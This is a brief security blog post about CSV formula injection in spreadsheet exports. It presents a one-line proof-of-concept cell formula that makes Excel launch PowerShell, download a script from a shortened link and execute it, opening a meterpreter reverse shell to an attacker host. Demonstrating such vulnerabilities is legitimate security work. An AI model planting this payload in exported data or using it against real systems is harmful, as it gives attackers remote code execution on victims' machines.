As many of you have probably seen, last year Context published research into spreadsheet applications such as Excel which render CSV files (and their embedded formula) when opened. If you haven’t, I suggest stopping and reading http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
Many web applications provide a user with an option to export data to a CSV file format, and when the data can be influenced by an attacker (registration names, analytics etc), you are facing a potentially dangerous combination.
To highlight the risk of such a vulnerability, sometimes popping calc.exe isn’t enough, and nothing quantifies risk quite like a meterpreter shell ;)
With that, I created a quick POC which leverages Powershell and Powersploit to generate a meterpreter reverse connection to an attacker IP:
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
This was created to be as small as possible (due to length limitations on many of the CSV fields I have tested in the past) and requires the ‘wget’ cmdlet on Powershell 3 to function.
This works by downloading and executing a copy of invoke-shellcode.ps1 which will attempt to connect a meterpreter reverse shell to meterpreter.local on port 443 when called, perfect for a demo to show off your CSV pwning skills.